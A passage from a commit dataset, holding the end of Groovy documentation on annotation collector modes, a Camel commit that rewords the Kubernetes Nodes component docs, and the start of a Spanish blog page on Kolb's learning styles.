- which are a frequent target for\naggregating. Having said that, by simply setting the `mode`, a number of commonly\nexpected scenarios are handled automatically for you within any extra coding.\nThe behavior of the `mode` parameter is determined by the `AnnotationCollectorMode`\nenum value chosen and is summarized in the following table.\n\n|================================\n| Mode | Description\n| DUPLICATE | Annotations from the annotation collection will always be inserted. 
After all transforms have been run, it will be an error if multiple annotations (excluding those with SOURCE retention) exist.\n| PREFER_COLLECTOR | Annotations from the collector will be added and any existing annotations with the same name will be removed.\n| PREFER_COLLECTOR_MERGED | Annotations from the collector will be added and any existing annotations with the same name will be removed, but any new parameters found within existing annotations will be merged into the added annotation.\n| PREFER_EXPLICIT | Annotations from the collector will be ignored if any existing annotations with the same name are found.\n| PREFER_EXPLICIT_MERGED | Annotations from the collector will be ignored if any existing annotations with the same name are found, but any new parameters on the collector annotation will be added to existing annotations.\n|================================\n\n[[meta-ann-processor]]\n===== Custom annotation processors\n\nA custom annotation processor lets you choose how to expand a\nmeta-annotation into collected annotations. The behavior of the meta-annotation is,\nin this case, totally up to you. To do this, you must:\n\n* create a meta-annotation processor, extending gapi:org.codehaus.groovy.transform.AnnotationCollectorTransform[AnnotationCollectorTransform]\n* declare the processor to be used in the meta-annotation declaration\n\nTo illustrate this, we are going to explore how the meta-annotation `@CompileDynamic` is implemented.\n\n`@CompileDynamic` is a meta-annotation that expands itself\nto\u00a0`@CompileStatic(TypeCheckingMode.SKIP)`. The problem is that the\ndefault meta-annotation processor doesn\u2019t support enums, and the\nannotation value `TypeCheckingMode.SKIP` is one.\n\nThe naive implementation here would not work:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=compiledynamic_naive,indent=0]\n----\n\nInstead, we will define it like this:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=compiledynamic_def_fixed,indent=0]\n----\n\nThe first thing you may notice is that our interface is no longer\nannotated with\u00a0`@CompileStatic`. The reason for this is that we rely on\nthe `processor` parameter instead, which references a class that\nwill\u00a0*generate* the annotation.\n\nHere is how the custom processor is implemented:\n\n[source,groovy]\n.CompileDynamicProcessor.groovy\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=compiledynamic_processor,indent=0]\n----\n<1> our custom processor is written in Groovy, and for better compilation performance, we use static compilation\n<2> the custom processor has to extend gapi:org.codehaus.groovy.transform.AnnotationCollectorTransform[AnnotationCollectorTransform]\n<3> create a class node representing the `@CompileStatic` annotation type\n<4> create a class node representing the `TypeCheckingMode` enum type\n<5> `collector` is the `@AnnotationCollector` node found in the meta-annotation. 
Usually unused.\n<6> `aliasAnnotationUsage` is the meta-annotation being expanded, here it is `@CompileDynamic`\n<7> `aliasAnnotated` is the node being annotated with the meta-annotation\n<8> `sourceUnit` is the `SourceUnit` being compiled\n<9> we create a new annotation node for `@CompileStatic`\n<10> we create an expression equivalent to `TypeCheckingMode.SKIP`\n<11> we add that expression to the annotation node, which is now `@CompileStatic(TypeCheckingMode.SKIP)`\n<12> return the generated annotation\n\nIn the example, the `visit` method is the only method which has to be overridden. It is meant to return a list of\nannotation nodes that will be added to the node annotated with the meta-annotation. In this example, we return a\nsingle one corresponding to `@CompileStatic(TypeCheckingMode.SKIP)`.\n\n=== Inheritance\n\n(TBD)\n\n\n[[generics]]\n=== Generics\n\n(TBD)\n\n\ninclude::{projectdir}\/src\/spec\/doc\/core-traits.adoc[leveloffset=+1]\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ac3bedb486840a1e421b6c8392f4c5be26c6a69b","subject":"Camel-Kubernetes-nodes: Better description","message":"Camel-Kubernetes-nodes: Better description\n","repos":"pmoerenhout\/camel,nikhilvibhav\/camel,tadayosi\/camel,pmoerenhout\/camel,adessaigne\/camel,pmoerenhout\/camel,christophd\/camel,apache\/camel,tadayosi\/camel,tdiesler\/camel,pmoerenhout\/camel,tadayosi\/camel,alvinkwekel\/camel,mcollovati\/camel,nikhilvibhav\/camel,apache\/camel,nicolaferraro\/camel,christophd\/camel,tadayosi\/camel,gnodet\/camel,tadayosi\/camel,pax95\/camel,apache\/camel,nikhilvibhav\/camel,pax95\/camel,adessaigne\/camel,christophd\/camel,pmoerenhout\/camel,gnodet\/camel,tdiesler\/camel,adessaigne\/camel,tdiesler\/camel,nicolaferraro\/camel,tdiesler\/camel,gnodet\/camel,cunningt\/camel,tdiesler\/camel,tdiesler\/camel,alvinkwekel\/camel,gnodet\/camel,nikhilvibhav\/camel,mcollovati\/camel,pax95\/camel,christophd\/camel,cunningt\/camel,adessaigne\/camel,cunningt\/camel,mcollovati\/camel,alvinkwekel\/camel,pax95\/camel,christophd\/camel,apache\/camel,christophd\/camel,cunningt\/camel,pax95\/camel,adessaigne\/camel,mcollovati\/camel,cunningt\/camel,nicolaferraro\/camel,tadayosi\/camel,cunningt\/camel,pax95\/camel,apache\/camel,pmoerenhout\/camel,apache\/camel,gnodet\/camel,adessaigne\/camel,nicolaferraro\/camel,alvinkwekel\/camel","old_file":"components\/camel-kubernetes\/src\/main\/docs\/kubernetes-nodes-component.adoc","new_file":"components\/camel-kubernetes\/src\/main\/docs\/kubernetes-nodes-component.adoc","new_contents":"[[kubernetes-nodes-component]]\n= Kubernetes Nodes Component\n:docTitle: Kubernetes Nodes\n:artifactId: camel-kubernetes\n:description: Perform operations on Kubernetes Nodes and get notified on Node changes.\n:since: 2.17\n:supportLevel: Stable\n:component-header: Both producer and consumer are supported\n\/\/Manually maintained attributes\n:group: Kubernetes\n\n*Since Camel {since}*\n\n*{component-header}*\n\nThe Kubernetes Nodes component is one of xref:kubernetes-summary.adoc[Kubernetes Components] which\nprovides a producer to execute Kubernetes Node operations and a consumer to consume events related to Node objects.\n \n\n\n== Component Options\n\n\/\/ component options: START\nThe Kubernetes Nodes component supports 3 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *bridgeErrorHandler* (consumer) | Allows for bridging the consumer to the Camel routing Error Handler, which 
mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | boolean\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *basicPropertyBinding* (advanced) | Whether the component should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n|===\n\/\/ component options: END\n\n\n== Endpoint Options\n\n\/\/ endpoint options: START\nThe Kubernetes Nodes endpoint is configured using URI syntax:\n\n----\nkubernetes-nodes:masterUrl\n----\n\nwith the following path and query parameters:\n\n=== Path Parameters (1 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *masterUrl* | *Required* Kubernetes Master url | | String\n|===\n\n\n=== Query Parameters (30 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *apiVersion* (common) | The Kubernetes API Version to use | | String\n| *dnsDomain* (common) | The dns domain, used for ServiceCall EIP | | String\n| *kubernetesClient* (common) | Default KubernetesClient to use if provided | | KubernetesClient\n| *portName* (common) | The port name, used for ServiceCall EIP | | String\n| *portProtocol* (common) | The port protocol, used for ServiceCall EIP | tcp | String\n| *bridgeErrorHandler* (consumer) | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | boolean\n| *labelKey* (consumer) | The Consumer Label key when watching at some resources | | String\n| *labelValue* (consumer) | The Consumer Label value when watching at some resources | | String\n| *namespace* (consumer) | The namespace | | String\n| *poolSize* (consumer) | The Consumer pool size | 1 | int\n| *resourceName* (consumer) | The Consumer Resource Name we would like to watch | | String\n| *exceptionHandler* (consumer) | To let the consumer use a custom ExceptionHandler. Notice if the option bridgeErrorHandler is enabled then this option is not in use. By default the consumer will deal with exceptions, that will be logged at WARN or ERROR level and ignored. | | ExceptionHandler\n| *exchangePattern* (consumer) | Sets the exchange pattern when the consumer creates an exchange. 
The value can be one of: InOnly, InOut, InOptionalOut | | ExchangePattern\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *operation* (producer) | Producer operation to do on Kubernetes | | String\n| *basicPropertyBinding* (advanced) | Whether the endpoint should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *connectionTimeout* (advanced) | Connection timeout in milliseconds to use when making requests to the Kubernetes API server. | | Integer\n| *synchronous* (advanced) | Sets whether synchronous processing should be strictly used, or Camel is allowed to use asynchronous processing (if supported). | false | boolean\n| *caCertData* (security) | The CA Cert Data | | String\n| *caCertFile* (security) | The CA Cert File | | String\n| *clientCertData* (security) | The Client Cert Data | | String\n| *clientCertFile* (security) | The Client Cert File | | String\n| *clientKeyAlgo* (security) | The Key Algorithm used by the client | | String\n| *clientKeyData* (security) | The Client Key data | | String\n| *clientKeyFile* (security) | The Client Key file | | String\n| *clientKeyPassphrase* (security) | The Client Key Passphrase | | String\n| *oauthToken* (security) | The Auth Token | | String\n| *password* (security) | Password to connect to Kubernetes | | String\n| *trustCerts* (security) | Define if the certs we used are trusted anyway or not | | Boolean\n| *username* (security) | Username to connect to Kubernetes | | String\n|===\n\/\/ endpoint options: END\n\n== Supported producer operations\n\n- listNodes\n- listNodesByLabels\n- getNode\n- createNode\n- deleteNode\n\n\n== Kubernetes Nodes Producer Examples\n\n- listNodes: this operation lists the nodes on a Kubernetes cluster\n\n[source,java]\n--------------------------------------------------------------------------------\nfrom(\"direct:list\").\n    toF(\"kubernetes-nodes:\/\/\/?kubernetesClient=#kubernetesClient&operation=listNodes\").\n    to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation returns a List of Nodes from your cluster.\n\n- listNodesByLabels: this operation lists the nodes by labels on a Kubernetes cluster\n\n[source,java]\n--------------------------------------------------------------------------------\nfrom(\"direct:listByLabels\").process(new Processor() {\n\n            @Override\n            public void process(Exchange exchange) throws Exception {\n                Map<String, String> labels = new HashMap<>();\n                labels.put(\"key1\", \"value1\");\n                labels.put(\"key2\", \"value2\");\n                exchange.getIn().setHeader(KubernetesConstants.KUBERNETES_NODES_LABELS, labels);\n            }\n        });\n    toF(\"kubernetes-nodes:\/\/\/?kubernetesClient=#kubernetesClient&operation=listNodesByLabels\").\n    to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation returns a List of Nodes from your cluster, using a label selector (with keys key1 
and key2, and values value1 and value2).\n\n== Kubernetes Nodes Consumer Example\n\n[source,java]\n--------------------------------------------------------------------------------\nfromF(\"kubernetes-nodes:\/\/%s?oauthToken=%s&resourceName=test\", host, authToken).process(new KubernetesProcessor()).to(\"mock:result\");\n\n    public class KubernetesProcessor implements Processor {\n        @Override\n        public void process(Exchange exchange) throws Exception {\n            Message in = exchange.getIn();\n            Node node = exchange.getIn().getBody(Node.class);\n            log.info(\"Got event with node name: \" + node.getMetadata().getName() + \" and action \" + in.getHeader(KubernetesConstants.KUBERNETES_EVENT_ACTION));\n        }\n    }\n--------------------------------------------------------------------------------\n\nThis consumer will return a list of events for the node test.\n\n\ninclude::camel-spring-boot::page$kubernetes-starter.adoc[]\n","old_contents":"[[kubernetes-nodes-component]]\n= Kubernetes Nodes Component\n:docTitle: Kubernetes Nodes\n:artifactId: camel-kubernetes\n:description: Perform operations on Kubernetes Nodes and get notified on Node changes.\n:since: 2.17\n:supportLevel: Stable\n:component-header: Both producer and consumer are supported\n\/\/Manually maintained attributes\n:group: Kubernetes\n\n*Since Camel {since}*\n\n*{component-header}*\n\nThe Kubernetes Nodes component is one of xref:kubernetes-summary.adoc[Kubernetes Components] which\nprovides a producer to execute kubernetes node operations and a consumer to consume kubernetes\nnode events.\n \n\n\n== Component Options\n\n\/\/ component options: START\nThe Kubernetes Nodes component supports 3 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *bridgeErrorHandler* (consumer) | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | boolean\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. 
| false | boolean\n| *basicPropertyBinding* (advanced) | Whether the component should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n|===\n\/\/ component options: END\n\n\n== Endpoint Options\n\n\/\/ endpoint options: START\nThe Kubernetes Nodes endpoint is configured using URI syntax:\n\n----\nkubernetes-nodes:masterUrl\n----\n\nwith the following path and query parameters:\n\n=== Path Parameters (1 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *masterUrl* | *Required* Kubernetes Master url | | String\n|===\n\n\n=== Query Parameters (30 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *apiVersion* (common) | The Kubernetes API Version to use | | String\n| *dnsDomain* (common) | The dns domain, used for ServiceCall EIP | | String\n| *kubernetesClient* (common) | Default KubernetesClient to use if provided | | KubernetesClient\n| *portName* (common) | The port name, used for ServiceCall EIP | | String\n| *portProtocol* (common) | The port protocol, used for ServiceCall EIP | tcp | String\n| *bridgeErrorHandler* (consumer) | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | boolean\n| *labelKey* (consumer) | The Consumer Label key when watching at some resources | | String\n| *labelValue* (consumer) | The Consumer Label value when watching at some resources | | String\n| *namespace* (consumer) | The namespace | | String\n| *poolSize* (consumer) | The Consumer pool size | 1 | int\n| *resourceName* (consumer) | The Consumer Resource Name we would like to watch | | String\n| *exceptionHandler* (consumer) | To let the consumer use a custom ExceptionHandler. Notice if the option bridgeErrorHandler is enabled then this option is not in use. By default the consumer will deal with exceptions, that will be logged at WARN or ERROR level and ignored. | | ExceptionHandler\n| *exchangePattern* (consumer) | Sets the exchange pattern when the consumer creates an exchange. The value can be one of: InOnly, InOut, InOptionalOut | | ExchangePattern\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *operation* (producer) | Producer operation to do on Kubernetes | | String\n| *basicPropertyBinding* (advanced) | Whether the endpoint should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *connectionTimeout* (advanced) | Connection timeout in milliseconds to use when making requests to the Kubernetes API server. 
| | Integer\n| *synchronous* (advanced) | Sets whether synchronous processing should be strictly used, or Camel is allowed to use asynchronous processing (if supported). | false | boolean\n| *caCertData* (security) | The CA Cert Data | | String\n| *caCertFile* (security) | The CA Cert File | | String\n| *clientCertData* (security) | The Client Cert Data | | String\n| *clientCertFile* (security) | The Client Cert File | | String\n| *clientKeyAlgo* (security) | The Key Algorithm used by the client | | String\n| *clientKeyData* (security) | The Client Key data | | String\n| *clientKeyFile* (security) | The Client Key file | | String\n| *clientKeyPassphrase* (security) | The Client Key Passphrase | | String\n| *oauthToken* (security) | The Auth Token | | String\n| *password* (security) | Password to connect to Kubernetes | | String\n| *trustCerts* (security) | Define if the certs we used are trusted anyway or not | | Boolean\n| *username* (security) | Username to connect to Kubernetes | | String\n|===\n\/\/ endpoint options: END\n\n== Supported producer operation\n\n- listNodes\n- listNodesByLabels\n- getNode\n- createNode\n- deleteNode\n\n\n== Kubernetes Nodes Producer Examples\n\n- listNodes: this operation list the nodes on a kubernetes cluster\n\n[source,java]\n--------------------------------------------------------------------------------\nfrom(\"direct:list\").\n toF(\"kubernetes-nodes:\/\/\/?kubernetesClient=#kubernetesClient&operation=listNodes\").\n to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation return a List of Nodes from your cluster\n\n- listNodesByLabels: this operation list the nodes by labels on a kubernetes cluster\n\n[source,java]\n--------------------------------------------------------------------------------\nfrom(\"direct:listByLabels\").process(new Processor() {\n\n @Override\n public void process(Exchange exchange) throws Exception {\n Map<String, String> labels = new HashMap<>();\n labels.put(\"key1\", \"value1\");\n labels.put(\"key2\", \"value2\");\n exchange.getIn().setHeader(KubernetesConstants.KUBERNETES_NODES_LABELS, labels);\n }\n });\n toF(\"kubernetes-deployments:\/\/\/?kubernetesClient=#kubernetesClient&operation=listNodesByLabels\").\n to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation return a List of Nodes from your cluster, using a label selector (with key1 and key2, with value value1 and value2)\n\n== Kubernetes Nodes Consumer Example\n\n[source,java]\n--------------------------------------------------------------------------------\nfromF(\"kubernetes-nodes:\/\/%s?oauthToken=%s&resourceName=test\", host, authToken).process(new KubernertesProcessor()).to(\"mock:result\");\n\n public class KubernertesProcessor implements Processor {\n @Override\n public void process(Exchange exchange) throws Exception {\n Message in = exchange.getIn();\n Node node = exchange.getIn().getBody(Node.class);\n log.info(\"Got event with configmap name: \" + node.getMetadata().getName() + \" and action \" + in.getHeader(KubernetesConstants.KUBERNETES_EVENT_ACTION));\n }\n }\n--------------------------------------------------------------------------------\n\nThis consumer will return a list of events for the node test.\n\n\ninclude::camel-spring-boot::page$kubernetes-starter.adoc[]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"eee097eec30a25ccb9fd68108e6a1cc0e23eb5b3","subject":"Publish 
17-07-2016-Los-estilos-de-aprendizaje-de-Kolb.adoc","message":"Publish 17-07-2016-Los-estilos-de-aprendizaje-de-Kolb.adoc","repos":"marchelo2212\/marchelo2212.github.io,marchelo2212\/marchelo2212.github.io,marchelo2212\/marchelo2212.github.io","old_file":"17-07-2016-Los-estilos-de-aprendizaje-de-Kolb.adoc","new_file":"17-07-2016-Los-estilos-de-aprendizaje-de-Kolb.adoc","new_contents":"<!DOCTYPE html>\n<html>\n<head>\n <meta charset=\"utf-8\" \/>\n <meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\" \/>\n\n <title>Los estilos de aprendizaje de Kolb - Tecnolog\u00eda, Innovaci\u00f3n y m\u00e1s..<\/title>\n\n <meta name=\"HandheldFriendly\" content=\"True\">\n <meta name=\"MobileOptimized\" content=\"320\">\n <meta name=\"apple-mobile-web-app-capable\" content=\"yes\">\n <meta name=\"apple-mobile-web-app-status-bar-style\" content=\"black-translucent\">\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, maximum-scale=1\">\n\n <meta name=\"description\" content=\"\">\n\n <meta name=\"twitter:card\" content=\"summary\">\n <meta name=\"twitter:title\" content=\"Los estilos de aprendizaje de Kolb\">\n <meta name=\"twitter:description\" content=\"\">\n\n <meta property=\"og:type\" content=\"article\">\n <meta property=\"og:title\" content=\"Los estilos de aprendizaje de Kolb\">\n <meta property=\"og:description\" content=\"\">\n\n <link href=\"\/favicon.ico\" rel=\"shortcut icon\" type=\"image\/x-icon\">\n <link href=\"\/apple-touch-icon-precomposed.png\" rel=\"apple-touch-icon\">\n\n <link rel=\"stylesheet\" type=\"text\/css\" href=\"\/\/marchelo2212.github.io\/themes\/uno\/assets\/css\/uno.css?v=1.0.0\" \/>\n\n <link rel=\"canonical\" href=\"https:\/\/marchelo2212.github.io17-07-2016-Los-estilos-de-aprendizaje-de-Kolb.adoc\" \/>\n \n <meta property=\"og:site_name\" content=\"Tecnolog\u00eda, Innovaci\u00f3n y m\u00e1s..\" \/>\n <meta property=\"og:type\" content=\"article\" \/>\n <meta property=\"og:title\" content=\"Los estilos de aprendizaje de Kolb\" \/>\n <meta property=\"og:description\" content=\"Dentro de las diversas acciones que un docente desarrolla en clase siempre debe tomar en cuenta los divesos estilos de aprendizaje de sus estudiantes, de esta manera podemos asegurar que cada actividad podr\u00e1 generar un mejor aprendizaje en cada uno...\" \/>\n <meta property=\"og:url\" content=\"https:\/\/marchelo2212.github.io17-07-2016-Los-estilos-de-aprendizaje-de-Kolb.adoc\" \/>\n <meta property=\"article:published_time\" content=\"Invalid date\" \/>\n <meta property=\"article:modified_time\" content=\"2016-07-30T18:15:38.993Z\" \/>\n <meta property=\"article:tag\" content=\"e-learning\" \/>\n <meta property=\"article:tag\" content=\"innovaci\u00f3n\" \/>\n <meta property=\"article:tag\" content=\"estilos de aprendizaje\" \/>\n <meta property=\"article:tag\" content=\"TIC\" \/>\n <meta property=\"article:tag\" content=\"educaci\u00f3n\" \/>\n \n <meta name=\"twitter:card\" content=\"summary\" \/>\n <meta name=\"twitter:title\" content=\"Los estilos de aprendizaje de Kolb\" \/>\n <meta name=\"twitter:description\" content=\"Dentro de las diversas acciones que un docente desarrolla en clase siempre debe tomar en cuenta los divesos estilos de aprendizaje de sus estudiantes, de esta manera podemos asegurar que cada actividad podr\u00e1 generar un mejor aprendizaje en cada uno...\" \/>\n <meta name=\"twitter:url\" content=\"https:\/\/marchelo2212.github.io17-07-2016-Los-estilos-de-aprendizaje-de-Kolb.adoc\" \/>\n \n <script type=\"application\/ld+json\">\n{\n 
\"@context\": \"http:\/\/schema.org\",\n \"@type\": \"Article\",\n \"publisher\": \"Tecnolog\u00eda, Innovaci\u00f3n y m\u00e1s..\",\n \"author\": {\n \"@type\": \"Person\",\n \"name\": \"Marcelo Sotaminga\",\n \"image\": \"https:\/\/avatars.githubusercontent.com\/u\/9286299?v=3\",\n \"url\": \"undefined\/author\/undefined\",\n \"sameAs\": null\n },\n \"headline\": \"Los estilos de aprendizaje de Kolb\",\n \"url\": \"https:\/\/marchelo2212.github.io17-07-2016-Los-estilos-de-aprendizaje-de-Kolb.adoc\",\n \"datePublished\": \"Invalid date\",\n \"dateModified\": \"2016-07-30T18:15:38.993Z\",\n \"keywords\": \"e-learning, innovaci\u00f3n, estilos de aprendizaje, TIC, educaci\u00f3n\",\n \"description\": \"Dentro de las diversas acciones que un docente desarrolla en clase siempre debe tomar en cuenta los divesos estilos de aprendizaje de sus estudiantes, de esta manera podemos asegurar que cada actividad podr\u00e1 generar un mejor aprendizaje en cada uno...\"\n}\n <\/script>\n\n <meta name=\"generator\" content=\"Ghost ?\" \/>\n <link rel=\"alternate\" type=\"application\/rss+xml\" title=\"Tecnolog\u00eda, Innovaci\u00f3n y m\u00e1s..\" href=\"https:\/\/marchelo2212.github.io\/rss\" \/>\n <link rel=\"stylesheet\" href=\"\/\/cdnjs.cloudflare.com\/ajax\/libs\/highlight.js\/8.4\/styles\/default.min.css\">\n\n<\/head>\n<body class=\"post-template tag-e-learning tag-innovacion tag-estilos-de-aprendizaje tag-TIC tag-educacion no-js\">\n\n <span class=\"mobile btn-mobile-menu\">\n <i class=\"icon icon-list btn-mobile-menu__icon\"><\/i>\n <i class=\"icon icon-x-circle btn-mobile-close__icon hidden\"><\/i>\n <\/span>\n\n <header class=\"panel-cover panel-cover--collapsed \" >\n <div class=\"panel-main\">\n \n <div class=\"panel-main__inner panel-inverted\">\n <div class=\"panel-main__content\">\n \n <h1 class=\"panel-cover__title panel-title\"><a href=\"https:\/\/marchelo2212.github.io\" title=\"link to homepage for Tecnolog\u00eda, Innovaci\u00f3n y m\u00e1s..\">Tecnolog\u00eda, Innovaci\u00f3n y m\u00e1s..<\/a><\/h1>\n <hr class=\"panel-cover__divider\" \/>\n <p class=\"panel-cover__description\">Sitio dedicado a recopilar las cosas que he realizado en algunos lados, para poder tenerlas todas un poco ordenadas, aqu\u00ed encontrar\u00e1s cosas referente a:\n Software Libre - GNU \/ Linux\n Innovaci\u00f3n Educativa\n Ciencia y Tecnolog\u00eda\n Entre otras....\n <\/p>\n <hr class=\"panel-cover__divider panel-cover__divider--secondary\" \/>\n \n <div class=\"navigation-wrapper\">\n \n <nav class=\"cover-navigation cover-navigation--primary\">\n <ul class=\"navigation\">\n <li class=\"navigation__item\"><a href=\"https:\/\/marchelo2212.github.io\/#blog\" title=\"link to Tecnolog\u00eda, Innovaci\u00f3n y m\u00e1s.. 
blog\" class=\"blog-button\">Blog<\/a><\/li>\n <\/ul>\n <\/nav>\n \n \n \n <nav class=\"cover-navigation navigation--social\">\n <ul class=\"navigation\">\n \n <!-- Twitter -->\n <li class=\"navigation__item\">\n <a href=\"https:\/\/www.facebook.com\/marchelo2212\" title=\"Facebook account\">\n <i class='icon icon-social-facebook'><\/i>\n <span class=\"label\">Facebook<\/span>\n <\/a>\n <\/li>\n \n <!-- Twitter -->\n <li class=\"navigation__item\">\n <a href=\"https:\/\/twitter.com\/Marchelo2212\" title=\"Twitter account\">\n <i class='icon icon-social-twitter'><\/i>\n <span class=\"label\">Twitter<\/span>\n <\/a>\n <\/li>\n \n <!-- Google Plus -->\n <li class=\"navigation__item\">\n <a href=\"https:\/\/plus.google.com\/u\/0\/+MarceloSotaminga\" title=\"Google+ account\">\n <i class='icon icon-social-google-plus'><\/i>\n <span class=\"label\">Google-plus<\/span>\n <\/a>\n <\/li>\n \n \n \n \n \n <!-- LinkedIn -->\n <li class=\"navigation__item\">\n <a href=\"https:\/\/ec.linkedin.com\/in\/marcelo-sotaminga-9ab64562\" title=\"LinkedIn account\">\n <i class='icon icon-social-linkedin'><\/i>\n <span class=\"label\">LinkedIn<\/span>\n <\/a>\n <\/li>\n \n <!-- Email -->\n <li class=\"navigation__item\">\n <a href=\"mailto:marcelo@openmailbox.org\" title=\"Email marcelo@openmailbox.org\">\n <i class='icon icon-mail'><\/i>\n <span class=\"label\">Email<\/span>\n <\/a>\n <\/li>\n \n <\/ul>\n <\/nav>\n \n \n <\/div>\n \n <\/div>\n \n <\/div>\n \n <div class=\"panel-cover--overlay\"><\/div>\n <\/div>\n <\/header>\n\n <div class=\"content-wrapper\">\n <div class=\"content-wrapper__inner\">\n \n\n <article class=\"post-container post-container--single\">\n\n <header class=\"post-header\">\n <div class=\"post-meta\">\n <time datetime=\"Invalid date\" class=\"post-meta__date date\">Invalid date<\/time> • <span class=\"post-meta__tags tags\">on <a href=\"https:\/\/marchelo2212.github.io\/tag\/e-learning\">e-learning<\/a>, <a href=\"https:\/\/marchelo2212.github.io\/tag\/innovacion\"> innovaci\u00f3n<\/a>, <a href=\"https:\/\/marchelo2212.github.io\/tag\/estilos-de-aprendizaje\"> estilos de aprendizaje<\/a>, <a href=\"https:\/\/marchelo2212.github.io\/tag\/TIC\">TIC<\/a>, <a href=\"https:\/\/marchelo2212.github.io\/tag\/educacion\"> educaci\u00f3n<\/a><\/span>\n <span class=\"post-meta__author author\"><img src=\"https:\/\/avatars.githubusercontent.com\/u\/9286299?v=3\" alt=\"profile image for Marcelo Sotaminga\" class=\"avatar post-meta__avatar\" \/> by Marcelo Sotaminga<\/span>\n <\/div>\n <h1 class=\"post-title\">Los estilos de aprendizaje de Kolb<\/h1>\n <\/header>\n\n <section class=\"post tag-e-learning tag-innovacion tag-estilos-de-aprendizaje tag-TIC tag-educacion\">\n <div id=\"preamble\">\n<div class=\"sectionbody\">\n<div class=\"paragraph\">\n<p>Dentro de las diversas acciones que un docente desarrolla en clase siempre debe tomar en cuenta los divesos estilos de aprendizaje de sus estudiantes, de esta manera podemos asegurar que cada actividad podr\u00e1 generar un mejor aprendizaje en cada uno de ellos y responder a la diversidad de caracter\u00edsiticas de los mismo.<\/p>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"sect1\">\n<h2 id=\"_estilos_de_aprendizaje\">Estilos de aprendizaje<\/h2>\n<div class=\"sectionbody\">\n<div class=\"paragraph\">\n<p>El emplear metodolog\u00edas que apunten a mantener como eje central al estudiante deber\u00e1n tomar en cuenta la heterogeneidad del grupo y trabajar (planificando y aplicado) diversas estrategias did\u00e1ctiva que permitan justamente que todo el 
